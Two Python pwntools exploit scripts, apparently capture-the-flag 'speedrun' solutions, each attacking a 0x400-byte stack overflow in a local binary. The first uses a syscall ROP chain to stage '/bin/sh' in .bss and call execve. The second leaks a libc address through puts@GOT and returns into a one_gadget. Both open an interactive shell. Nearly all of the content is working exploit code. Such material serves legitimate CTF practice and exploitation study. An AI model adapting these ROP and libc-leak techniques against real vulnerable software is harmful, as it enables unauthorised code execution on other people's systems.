speedrun1_exploit.py
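# speedrun-style stage-1 exploit: non-PIE, statically linked target with a
# stack overflow after 0x400 bytes of input.  The ROP chain calls
# read(0, .bss, 8) to stage "/bin/sh\0" at a fixed writable address, then
# execve(.bss, NULL, NULL) via raw syscalls (no libc call is needed in a
# static binary).
#
# All payload fragments are bytes so the script runs on pwntools >= 4
# (Python 3), where str + p64() raises TypeError.  On Python 2 b"..." is a
# plain str, so behaviour there is unchanged.
from pwn import *

e = ELF('./vuln')
context.binary = e            # arch/bits/endianness for p64(), logs, gdb
p = process("./vuln")

# Gadget addresses are tied to this exact binary (static, no PIE).  Each one
# is sanity-checked against the bytes in the ELF below so a rebuilt or
# different binary fails loudly instead of crashing the chain mid-way.
syscall = 0x474e65            # syscall ; ret
pop_eax = 0x415664            # pop rax ; ret  (name kept from the original)
pop_rdi = 0x400686            # pop rdi ; ret
pop_rsi = 0x4101f3            # pop rsi ; ret
pop_rdx = 0x4498b5            # pop rdx ; ret

gadgets = {
    "pop rax ; ret": (pop_eax, b"\x58"),
    "pop rdi ; ret": (pop_rdi, b"\x5f"),
    "pop rsi ; ret": (pop_rsi, b"\x5e"),
    "pop rdx ; ret": (pop_rdx, b"\x5a"),
    "syscall":       (syscall, b"\x0f\x05"),
}
for desc, (addr, opcode) in gadgets.items():
    found = e.read(addr, len(opcode))
    if found != opcode:
        # log.error() raises, so nothing below runs with a bogus chain.
        log.error("gadget '%s' expected at %#x, read %r: wrong binary?"
                  % (desc, addr, found))

SYS_READ = 0
SYS_EXECVE = 59

binsh = b"/bin/sh\x00"
# Start of .bss: writable and at a fixed address in a non-PIE binary.
# NOTE(review): whatever the binary keeps at the very start of .bss is
# overwritten by these 8 bytes; if the process dies before execve, move
# the string further in, e.g. e.bss(0x100).
binsh_addr = e.bss()

# 0x400-byte buffer, then 8 bytes of saved rbp ("B"s make the frame easy to
# spot in a crash dump), then the return address where the chain starts.
payload = b"A" * 0x400
payload += b"B" * 8

# read(0, binsh_addr, len(binsh)) -- pulls "/bin/sh\0" from our stdin.
payload += p64(pop_eax) + p64(SYS_READ)
payload += p64(pop_rdi) + p64(0)
payload += p64(pop_rsi) + p64(binsh_addr)
payload += p64(pop_rdx) + p64(len(binsh))
payload += p64(syscall)

# execve(binsh_addr, NULL, NULL)
payload += p64(pop_eax) + p64(SYS_EXECVE)
payload += p64(pop_rdi) + p64(binsh_addr)
payload += p64(pop_rsi) + p64(0)
payload += p64(pop_rdx) + p64(0)
payload += p64(syscall)

p.sendlineafter(b"words?\n", payload)

# The "/bin/sh" bytes must be consumed by the chain's read(), not by the
# program's own read() that takes the overflow.  There is no prompt to sync
# on between the two, so the original script separates the writes with a
# short delay; increase it on a slow or loaded machine if the chain hangs
# in read().
sleep(0.1)
p.send(binsh)
p.interactive()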
speedrun2_exploit.py
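# speedrun-style stage-2 exploit: dynamically linked, non-PIE target with the
# same 0x400-byte stack overflow.  Round 1 leaks puts@GLIBC by returning
# into puts(puts@GOT) and then re-entering the vulnerable function; round 2
# computes the libc base and returns into a one_gadget.
#
# All payload fragments and prompts are bytes so the script runs on
# pwntools >= 4 (Python 3); on Python 2 b"..." is plain str, so behaviour
# there is unchanged.  print() with one argument works on both.
from pwn import *

e = ELF('./vuln')
context.binary = e
l = e.libc                    # the libc pwntools resolves for ./vuln
if l is None:
    # log.error() raises; the offsets below are meaningless without a libc.
    log.error("could not resolve the libc ./vuln loads (check ldd / LD_LIBRARY_PATH)")
p = process("./vuln")

# one_gadget offset for the libc build this script was written against.
# NOTE(review): this is libc-version specific.  If the alignment check on the
# leak passes but no shell appears, rerun `one_gadget <l.path>` and update it.
ONE_GADGET_OFF = 0x10a38c

pop_rdi = 0x4008a3            # pop rdi ; ret
vuln_ret = 0x40074C           # re-enter the vulnerable function for round 2
offset = 0x400 + 8            # buffer + saved rbp
magic = b"Everything intelligent is so boring."

# Round 1: puts(puts@GOT) leaks the resolved address, then loop back.
p.sendlineafter(b"now?\n", magic)
payload = b"A" * offset
payload += p64(pop_rdi) + p64(e.got['puts']) + p64(e.plt['puts'])
payload += p64(vuln_ret)
p.sendlineafter(b"more.\n", payload)

print(p.recvuntil(b"Fascinating.\n"))
# puts() stops at the first NUL, so only the 6 significant bytes of the
# 64-bit address arrive; pad back to 8 before unpacking.
puts_addr = u64(p.recv(6).ljust(8, b"\x00"))
libc_base = puts_addr - l.symbols['puts']
log.info("puts@libc = %#x  libc base = %#x" % (puts_addr, libc_base))
# libc is mapped page-aligned; a non-zero low 12 bits means either the leak
# was misparsed or l is not the libc the process actually loaded.
if libc_base & 0xfff:
    log.error("libc base %#x is not page aligned: bad leak or wrong libc" % libc_base)
one_addr = libc_base + ONE_GADGET_OFF

# Round 2: same overflow, return straight into the one_gadget.
p.sendlineafter(b"now?\n", magic)
payload2 = b"A" * offset
payload2 += p64(one_addr)
print(p.sendlineafter(b"more.\n", payload2))
sleep(0.1)
p.interactive()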